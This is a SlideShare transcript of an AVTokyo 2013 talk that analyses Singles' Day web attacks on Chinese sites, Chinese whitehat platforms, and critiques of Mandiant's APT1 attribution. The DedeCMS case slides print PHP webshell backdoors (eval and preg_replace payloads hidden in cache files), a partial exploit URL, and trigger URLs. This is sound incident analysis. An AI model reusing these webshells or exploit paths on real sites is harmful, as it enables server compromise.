China is a victim, too :)
(AVTokyo Special Edition)
Darkfloyd x Zetta, VXRL
感謝 ! AVTokyo!
Thank you so much to
AVTokyo Panelist
Disclaimer
We are not working for China or Hong Kong
government
We didn't get any fund or money from Hong Kong
and China g...
Objective
●

China is always taken as a proactive attacker,
we wanna show there is another flip side of
analysis through:
...
Part 1: A single day of Web attack analysis
against various web sites in China.
Research and Analysis
●

●

●

We have got a sharing of attack log/data
captured by their cloud-based application
firewall...
Single's Day ?
Single's Day
Single’s Day as Cyber Monday

http://en.wikipedia.org/wiki/Singles_Day
Research and Analysis
●

What do we wanna observe and analyze?
−

Percentage distribution: Attack from overseas Vs
Attack ...
11 Nov: Attack Traffic Vs Period
11 Nov: Attack Traffic Vs Period:
Evening and Night Time
Attack Type Distribution
Attack
Type
SCANN
ER

No. of
Request

Perc
entag
e

5910124 91.34
8 47%

LRFI

218753

0.338
1%

...
Where are those attackers
on e-Shopping Day (11 Nov 2013)?
According to our analysis, 97.5% is from “Within
China IP Addre...
How about excluding scanner type?
Country Attack
China
1070489
US
18588
Netherlands
5404
Hong Kong
4288
Korea
1823
Turkey
...
Top 25 Attackers

Top 25 Attack
IP
Addresses are
From China,
EXCEPT 24th,
it is from US.
Case Studies: Victim or not?!
Voting for a “Good Guy”

Tou.php – “Tou” means “Voting”, in Chinese is
“ 投”
The requests against this site is with 6.5GB d...
When looking at the traffic, we have
found attack traffic from Hong Kong
Abuse X-Forwarder to fake different IP address to...
My favorite ISP :)
Hey, it is 11 Nov (Single's day) for
Shopping!
We have found attacks against “Group Purchase
Web site”, 47 attempts to acc...
How about those overseas
attackers?
Where are they?
Country
China
US
Korea
Hong Kong
Thailand
Taiwan
Japan

IP
116.252.224...
Observation: Any interesting attack
payload from overseas?
From US ?! Using China Python Layer-7DDoS
script?! :) (from 00:...
Observation: China Tools, IP
address from US :)
http://www.dklkt.cn/article.asp?id=233
How about attack traffic from US?
How about attack traffic from US?

•
•
•

Scanning and exploiting particular recently
released vulnerabilities of CMS.
We ...
How about attack traffic from JP?
How about attack traffic from JP?
Nothing special, only casual download, traffic
necessarily from scanner.
Interestingly,w...
How about attack traffic from KR?
Nothing special, only casual download, not
necessarily from scanner.
315online.com.cn - ...
How about attack traffic from TW
and TH?
Typical scanner traffic, nothing special.
How about attack traffic from
Netherland?
Scan a Wordpress-similar site in China
Observation: Special Payloads
against victims
●

●
●

<URL>/plus/download.php?open=1&arrs1%5B
%5D=99&arrs1%5B%5D=102&arrs1...
Dedecms (China-made CMS)
DedeCMS
Reference: DedeCMS Exploit
Interesting technique to hid the webshell: put it like a cache file.
http://www.nxadmin.com/pen...
As you have found 90sec.php from the log, and there is an .inc file with this statement:
{dede:php}file_put_contents(’90se...
It is strange that .htm page could be taken as a webshell, the idea is whether those htm
files are included and gernated b...
Triggering the backdoor webshell with the following
URLs by passing in various ID values WITHOUT
detected by scanner:
http...
Part 2: Organizations with China Whitehats
Whitehats in China
Wooyun: Bugs published in China
●

The idea is the same as CVE-Mitre but more
informative and organized...
Observation #1:
CMS bugs everywhere (after Google
translate)

http://www.wooyun.org/bug.php?action=list&subtype=52
Observation #2:
Even some Whitehats reported the
vulns …..
●

●

Whitehat reported a high-risk vuln. to 360, but
360 said:...
Consistently ignore high and
medium level vuln. (highlighted in
Yellow color)

http://www.wooyun.org/corps/%E5%A5%87%E8%99...
Observation #3: Positive reward
from vendor and promotion of
whitehats
Zoomeye (www.zoomeye.org)
Whitehats in China: Anquan.org (A
Safety Alliance among various software
and security product vendors)
●

With 800 vendors...
If time permits….Part 3: APT1 Report – Counter
Comment from Ran2, VXRL
APT1 Report: Counter Comment
●
●

●

Anyone has read Mandiant APT1 Report?
Analysis was done by Ran2, Researcher,
VXRL.
Ma...
APT1 Report from Mandiant
●

On 18 February 2013, Mandiant, released an
unprecedented report – “APT1: Exposing One
of Chin...
APT1 Report from Mandiant
●

●

●

Chinese officials have vigorously denied any
link to what Mandiant’s accusations of the...
Clarification #1: Attacker Profiling
●

“APT1 is not a ghost in a digital machine”,
Mandinat claims; they had identified a...
Clarification #1: Attacker Profiling
●

●

Based on the profiling results, Mandiant
believed that these three personas wer...
Clarification #1: Attacker Profiling
●

Further search on the Internet, I also found
Jack Wang’s postings in the China mil...
Clarification #1: Attacker Profiling
●

Even though we have high chance to proof that
UglyGorilla is Jack Wang or Wang Don...
Clarification #1: Attacker Profiling
Similar to UglyGorilla, the APT1 Report identified
another persona, DOTA. Based on a ...
Clarification #1: Attacker Profiling
●

●

It is clearly proof that DOTA was using a
Shanghai telephone and he is fluent i...
Clarification #1: Attacker Profiling
●

●

Yes, it is interesting and there are lots of ways
to interpret the simple chara...
Clarification #2: Infrastructure,
Remote Desktop Sessions
●

On page 4, Mandiant mentioned that “there are
1,849 of the 1,...
Clarification #2: Infrastructure,
Remote Desktop Sessions
●

Based on the RDP Protocol document from
Microsoft, I found ou...
More details from APT1 Counter
Comment Report
−

http://espionageware.blogspot.hk/
Summary

●

●

●

●

●

Interesting payloads and practice against China
sites are shown.
Web attack from overseas against ...
Summary

●

●

●

●

Expect technical or/and journalist reports with
more reasonable deduction, sufficient proof and
scien...
感謝 Thank you so much :)
Respect and appreciate to Zetta and Ran2 for
their work, analysis and time
Highly Appreciate the a...
AVTokyo 2013.5 - China is a victim, too :-) (English version)
AVTokyo 2013.5 - China is a victim, too :-) (English version)
AVTokyo 2013.5 - China is a victim, too :-) (English version)
AVTokyo 2013.5 - China is a victim, too :-) (English version)
AVTokyo 2013.5 - China is a victim, too :-) (English version)
Upcoming SlideShare
Loading in …5
×

AVTokyo 2013.5 - China is a victim, too :-) (English version)

10,786 views

Published on

{Anthony LAI, Zetta KE}, Researcher

[en] China is a victim, too :-)
アンソニー・ライ、ゼッタ KE
中国はいつも他者を攻撃する攻撃者として認識されているが、逆に「中国が誰かから攻撃を受けているのではないか?」という視点で、どのような攻撃をうけ、どんな理由があるのか?をお見せしよう。
さらに、他の有名な機関から発表されたAPTの調査報告書の内容から、中国からの攻撃を「推測」し、それらの「論理」についてのコメントする。
また、我々はKnownsecからキャプチャされたWeb攻撃データをVXRLで解析を行っており、うまくいけば、より鮮明な絵をお見せすることができると考えている。
もちろん、アジェンダにないオフレコ情報もあるので、みなさんに楽しんでもらえると思う。

China is always taken as an attacker to attack others, let us take a look who is attacking China, what kind of attacks China is suffering from and the possible reason, moreover, we would like to take APT research report published from other famous agency how they "deduce" the attacks from China, commenting on their "logic".
In addition, we have got Knownsec to provide captured and identified Web attack data to VXRL for analysis, hopefully, we could get a much more clearer picture.
Of course, we got a hidden agenda as well.
It would be a fun session and let us enjoy it..

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
10,786
On SlideShare
0
From Embeds
0
Number of Embeds
229
Actions
Shares
0
Downloads
22
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

AVTokyo 2013.5 - China is a victim, too :-) (English version)

  1. 1. China is a victim, too :) (AVTokyo Special Edition) Darkfloyd x Zetta, VXRL
  2. 2. 感謝 ! AVTokyo! Thank you so much to AVTokyo Panelist
  3. 3. Disclaimer We are not working for China or Hong Kong government We didn't get any fund or money from Hong Kong and China government
  4. 4. Objective ● China is always taken as a proactive attacker, we wanna show there is another flip side of analysis through: − Part 1: A single day of Web attack analysis against various web sites in China. − Part 2: How do you know vulnerabilities published in China software and web site? ● − Media always talks about blackhats in China. How about whitehats in China? Part 3: APT1 report counter-comment (From Ran2)
  5. 5. Part 1: A single day of Web attack analysis against various web sites in China.
  6. 6. Research and Analysis ● ● ● We have got a sharing of attack log/data captured by their cloud-based application firewall from Knownsec, Beijing with VXRL so as to carry out the analysis. We have picked 11 Nov, which is a day for online shopping/e-commerce (Single's Day, 光棍節 ) with discount within Mainland China for this talk. We will not disclose any victims' IP address and domain name depending on the criticality or the nature/impact of attack.
  7. 7. Single's Day ?
  8. 8. Single's Day
  9. 9. Single’s Day as Cyber Monday http://en.wikipedia.org/wiki/Singles_Day
  10. 10. Research and Analysis ● What do we wanna observe and analyze? − Percentage distribution: Attack from overseas Vs Attack within country − What kind of attacks suffered for those top victims? − Any top attackers?! What are their favorite payloads skills? − What system(s)/platform(s) do the attackers target? − Any interesting attack payload?
  11. 11. 11 Nov: Attack Traffic Vs Period
  12. 12. 11 Nov: Attack Traffic Vs Period: Evening and Night Time
  13. 13. Attack Type Distribution Attack Type SCANN ER No. of Request Perc entag e 5910124 91.34 8 47% LRFI 218753 0.338 1% FILEI 222774 0.344 3% SPECI AL 35838 0.055 4% WEBS HELL 42463 0.065 6% 4491625 6.942 1% SQLI 274792 0.424 7% XSS 225796 0.349 0% COLLE CTOR
  14. 14. Where are those attackers on e-Shopping Day (11 Nov 2013)? According to our analysis, 97.5% is from “Within China IP Address”, the remaining 2.5% of attack is from overseas, but it includes scanner type.
  15. 15. How about excluding scanner type? Country Attack China 1070489 US 18588 Netherlands 5404 Hong Kong 4288 Korea 1823 Turkey 1429 Japan 872
  16. 16. Top 25 Attackers Top 25 Attack IP Addresses are From China, EXCEPT 24th, it is from US.
  17. 17. Case Studies: Victim or not?!
  18. 18. Voting for a “Good Guy” Tou.php – “Tou” means “Voting”, in Chinese is “ 投” The requests against this site is with 6.5GB data. In fact, we, Chinese are very positive to support and promote “Good act and Good guys” Possibly, it is hard to differentiate the real voters and robotic one
  19. 19. When looking at the traffic, we have found attack traffic from Hong Kong Abuse X-Forwarder to fake different IP address to voting from 58.64.X.X
  20. 20. My favorite ISP :)
  21. 21. Hey, it is 11 Nov (Single's day) for Shopping! We have found attacks against “Group Purchase Web site”, 47 attempts to access order info data of web site via old classical attack OS cmd
  22. 22. How about those overseas attackers? Where are they? Country China US Korea Hong Kong Thailand Taiwan Japan IP 116.252.224.162 173.208.240.190 119.70.29.137 58.64.205.27 110.34.230.226 118.233.66.105 202.89.232.79
  23. 23. Observation: Any interesting attack payload from overseas? From US ?! Using China Python Layer-7DDoS script?! :) (from 00:00 to 2359)
  24. 24. Observation: China Tools, IP address from US :) http://www.dklkt.cn/article.asp?id=233
  25. 25. How about attack traffic from US?
  26. 26. How about attack traffic from US? • • • Scanning and exploiting particular recently released vulnerabilities of CMS. We will discuss it more in details later. Targeting forum and CMS.
  27. 27. How about attack traffic from JP?
  28. 28. How about attack traffic from JP? Nothing special, only casual download, traffic necessarily from scanner. Interestingly,webscan.360.cn uses JP IP address to scan hosts in China
  29. 29. How about attack traffic from KR? Nothing special, only casual download, not necessarily from scanner. 315online.com.cn - An Anti-Online Fraud Portal
  30. 30. How about attack traffic from TW and TH? Typical scanner traffic, nothing special.
  31. 31. How about attack traffic from Netherland? Scan a Wordpress-similar site in China
  32. 32. Observation: Special Payloads against victims ● ● ● <URL>/plus/download.php?open=1&arrs1%5B %5D=99&arrs1%5B%5D=102&arrs1%5B %5D=103&arrs1%5B%5D=95&arrs1%5B %5D=100&arrs1%5B%5D=98&arrs1%5B %5D=112&arrs1%5B%5D=114&arrs1%5B %5D=101&arrs1%5B%5D=102&arrs1%5B %5D=105&arrs1%5B%5D=120&arrs2%5B %5D=109&arrs2%5B%5D=121&arrs2%5B Create Webshell backdoor under Dedecms Against Dedecms, I am kidding, there are lots of other victims suffered from this kind of vulns: http://www.wooyun.org/searchbug.php?q=dedecms
  33. 33. Dedecms (China-made CMS)
  34. 34. DedeCMS
  35. 35. Reference: DedeCMS Exploit Interesting technique to hid the webshell: put it like a cache file. http://www.nxadmin.com/penetration/1168.html http://blog.csdn.net/seoyundu/article/details/12855759 /plus/download.php exploit - Inject Webshell http://www.xiaosedi.com/post/dedecms_exp_01.html /plus/search.php exploit - Inject Webshell http://eoo.hk/oswork/28.htm DedeCMS backdoor killer from Anquan.org http://edu.cnw.com.cn/edu-security/netsec/websec/htm2013/20130807_27895
  36. 36. As you have found 90sec.php from the log, and there is an .inc file with this statement: {dede:php}file_put_contents(’90sec.php’,'<?php eval($_POST[guige]);?>’);{/dede:php} However, there is no such file found from the folder Why? Under data/cache folder, there are several htm (myad-1.htm,myad-16.htm,mytag-1208.htm) files are found with the following code: <!– document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”); –> <!– document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ? >axxxxx’);echo ‘OK’;@fclose($fp);?>”); –> <!– document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/ [copyright]/e’,$_REQUEST['guige'],’error’);?>”); –>
  37. 37. It is strange that .htm page could be taken as a webshell, the idea is whether those htm files are included and gernated by another PHP file After checking over, we have figured out: plus/mytag_js.php
  38. 38. Triggering the backdoor webshell with the following URLs by passing in various ID values WITHOUT detected by scanner: http://www.nxadmin.com/plus/mytag_js.php?id=1208 http://www.nxadmin.com/plus/ad_js.php?id=1 Reference:http://www.nxadmin.com/penetration/1168.html
  39. 39. Part 2: Organizations with China Whitehats
  40. 40. Whitehats in China Wooyun: Bugs published in China ● The idea is the same as CVE-Mitre but more informative and organized ● Vendor neutral ● Public and open ● Promote Whitehats community ( http://www.wooyun.org/whitehats/)
  41. 41. Observation #1: CMS bugs everywhere (after Google translate) http://www.wooyun.org/bug.php?action=list&subtype=52
  42. 42. Observation #2: Even some Whitehats reported the vulns ….. ● ● Whitehat reported a high-risk vuln. to 360, but 360 said: Ignored it ! My comment: WTF!
  43. 43. Consistently ignore high and medium level vuln. (highlighted in Yellow color) http://www.wooyun.org/corps/%E5%A5%87%E8%99%8E360
  44. 44. Observation #3: Positive reward from vendor and promotion of whitehats
  45. 45. Zoomeye (www.zoomeye.org)
  46. 46. Whitehats in China: Anquan.org (A Safety Alliance among various software and security product vendors) ● With 800 vendors ● Vendor neutral ● ● A platform for public to report any infringement, privacy violation, phishing attack, etc http://www.anquan.org/help/aboutus/authen/
  47. 47. If time permits….Part 3: APT1 Report – Counter Comment from Ran2, VXRL
  48. 48. APT1 Report: Counter Comment ● ● ● Anyone has read Mandiant APT1 Report? Analysis was done by Ran2, Researcher, VXRL. Mandiant deduced the attack against US from China PLA Team #61389 with the following deduction: − Attacker profiling via his password − Posts in the forum
  49. 49. APT1 Report from Mandiant ● On 18 February 2013, Mandiant, released an unprecedented report – “APT1: Exposing One of China’s Cyber Espionage Units”. Mandiant claims that they have identified evidence linking an APT attack group, APT1 (aka Comment Crew) to the Military Cover Designator 61398 of the People’s Liberation Army (PLA).
  50. 50. APT1 Report from Mandiant ● ● ● Chinese officials have vigorously denied any link to what Mandiant’s accusations of these APT activities. Some commentaries said: “Clearly, Mandiant caught Beijing’s hands in the cookie jar”. However, some other responses from skeptics said that the evidence produced by Mandiant did not include any alternative conclusions other than pointed at China or the so-called PLA hacking lacks of convincing evidence.
  51. 51. Clarification #1: Attacker Profiling ● “APT1 is not a ghost in a digital machine”, Mandinat claims; they had identified a select number of APT1 personas. In page 51 of the APT1 Report, they provided hints on how they perform the persona profiling, basically by data mining of: − the authors of APT1’s digital weapons, (ie the malware) − the registrants’ of APT1 FQDN, (aka FQDN profiling) − the email accounts (in pubic social websites) − the registration records of leaked hackers’ account, Rootkit.com
  52. 52. Clarification #1: Attacker Profiling ● ● Based on the profiling results, Mandiant believed that these three personas were based on Shanghai, responsible to authors the malware, preparing and launching the APT1 attacks and they are working for PLA. UglyGorilla (UG) is the key persona identified that leads to the above conclusion.
  53. 53. Clarification #1: Attacker Profiling ● Further search on the Internet, I also found Jack Wang’s postings in the China military forum. However, I discovered he, UglyGorilla or Jack Wang actually posted 15 messages, only 2 messages are related to cyber war, all others topics includes, normal warfare and even biochemical warfare. He even posted to the forum that he was a military warfare lover, but not mentioned he himself as a soldier. I think this piece of information should also be disclosed in the APT1 Report.
  54. 54. Clarification #1: Attacker Profiling ● Even though we have high chance to proof that UglyGorilla is Jack Wang or Wang Dong who is the author of the APT1 malware, I don’t find hard proof that he is a China soldier or servicing the PLA Unit 61398. The only link I can find is his posting in the Chinese military forum, but on the contrary he also said his was only a military lover.
  55. 55. Clarification #1: Attacker Profiling Similar to UglyGorilla, the APT1 Report identified another persona, DOTA. Based on a video captured, I guess it was gathered from a RDP connection on the monitored hop that DOTA was once used to register email accounts.
  56. 56. Clarification #1: Attacker Profiling ● ● It is clearly proof that DOTA was using a Shanghai telephone and he is fluent in English when communicate with other parties. I believe DOTA using the password of “2j3c1k” may means ( 二局三处一科 ) but we cannot rule out it bears other meanings, such as ( 二鸡三吃一刻 ) or the meaning of “the moment of cooking 2 chickens with three different ways”.
  57. 57. Clarification #1: Attacker Profiling ● ● Yes, it is interesting and there are lots of ways to interpret the simple characters in Chinese. I am not trying to find an exit for the accusation, but I would like to see more solid evidence pointing the fingers to the PLA Unit 61398 as APT1.
  58. 58. Clarification #2: Infrastructure, Remote Desktop Sessions ● On page 4, Mandiant mentioned that “there are 1,849 of the 1,905 sessions were observed using keyboard layout was “Chinese (Simplified) – US Keyboard” and they assumed that the attackers used Chinese version of Microsoft OS. Because the attackers are using Chinese version of Microsoft OS, Mandiant implies that APT1 are Mainland Chinese speakers.
  59. 59. Clarification #2: Infrastructure, Remote Desktop Sessions ● Based on the RDP Protocol document from Microsoft, I found out that the RDP client send out its keyboard layout in a 4-bytes specification to the RDP server (the victim or hop, in our case). If a network sniffer was installed on the RDP server, we can collect this piece of digital evidence. If the attackers used “Chinese (Simplified) – US Keyboard”, on the recipient side, we can locate a 4-bytes evidence of 0x0804 from the network packets.
  60. 60. More details from APT1 Counter Comment Report − http://espionageware.blogspot.hk/
  61. 61. Summary ● ● ● ● ● Interesting payloads and practice against China sites are shown. Web attack from overseas against China on 11 Nov (a day for high volume of e-commerce and online shopping) is not the majority. Majority of traffic is on crawler and scanner, other than that, the majority of attack is SQLi. There are lots of attacks against CMS systems in China. There are whitehat non-profit making organizations including Wooyun.org and Anquan.org to help the China security community.
  62. 62. Summary ● ● ● ● Expect technical or/and journalist reports with more reasonable deduction, sufficient proof and scientific analysis. We hope to see more balanced view and analysis reports not just labeling China is the only cyberwar actor in this party. We hope to see a more fair comment to talk about the positive side of security in China. Selling products and solutions are easy by giving a false sense of “threatening”,however, as a researcher, please keep your ethics high and mindset clear. We are researcher and scientist but opportunist.
  63. 63. 感謝 Thank you so much :) Respect and appreciate to Zetta and Ran2 for their work, analysis and time Highly Appreciate the attack log shared by Knownsec for research purpose. darkfloyd@vxrl.org ozetta@vxrl.org ran2@vxrl.org

×